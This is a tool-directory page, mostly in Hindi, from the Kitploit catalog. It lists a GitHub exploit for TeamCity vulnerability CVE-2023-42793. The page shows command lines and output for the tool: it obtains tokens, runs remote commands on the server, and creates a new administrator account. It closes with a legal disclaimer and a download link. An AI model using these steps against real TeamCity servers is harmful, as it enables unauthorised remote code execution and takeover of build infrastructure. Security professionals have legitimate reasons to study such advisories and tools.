Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-42793 — TeamCity 2023.05.3 - CVE-2023-42793 - Create username administrator. | Kitploit
उपकरण/GitHubGitHub/cxdxnt/cve-2023-42793
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubcxdxnt/cve-2023-42793

CVE-2023-42793

TeamCity 2023.05.3 - CVE-2023-42793 - Create username administrator.

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-42793 - व्यवस्थापक उपयोगकर्ता नाम बनाएँ

कमांड निष्पादन का उदाहरण:

root@kitploit:~
python3 exploit.py -u http://localhost
User add token ->  eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15  2020 .
drwxr-xr-x 1 root root 4096 Feb 28  2024 ..

StdErr: 
Exit code: 0
Time: 23ms

यदि टोकन समाप्त हो जाता है, तो एक नया स्वचालित रूप से बनाया जाएगा।

root@kitploit:~
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token ->  eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 24ms

व्यवस्थापक उपयोगकर्ता नाम बनाएँ:

root@kitploit:~
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator

यदि कोई मौजूदा उपयोगकर्ता है:

root@kitploit:~
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.

कानूनी चेतावनी

यह रिपॉज़िटरी केवल कंप्यूटर सुरक्षा में शैक्षिक और अनुसंधान उद्देश्यों के लिए है। बिना प्राधिकरण के सिस्टम से समझौता करने के लिए यहाँ वर्णित स्क्रिप्ट और तकनीकों का उपयोग अवैध है और यह राष्ट्रीय और अंतर्राष्ट्रीय कानूनों का उल्लंघन करता है, जैसे कि Law 26.388 (अर्जेंटीना), CFAA (यूएसए), और Budapest Convention।

लेखक यहाँ प्रदान की गई जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है। इस सामग्री का उपयोग केवल नियंत्रित वातावरण, प्रयोगशालाओं, CTF, या सिस्टम स्वामी की स्पष्ट अनुमति से ही अनुमत है।

यदि आप परीक्षण करने जा रहे हैं, तो सुनिश्चित करें कि आपके पास अनुमति है। बिना प्राधिकरण के हैकिंग नैतिक हैकिंग नहीं है; यह एक अपराध है।

टूल डाउनलोड करें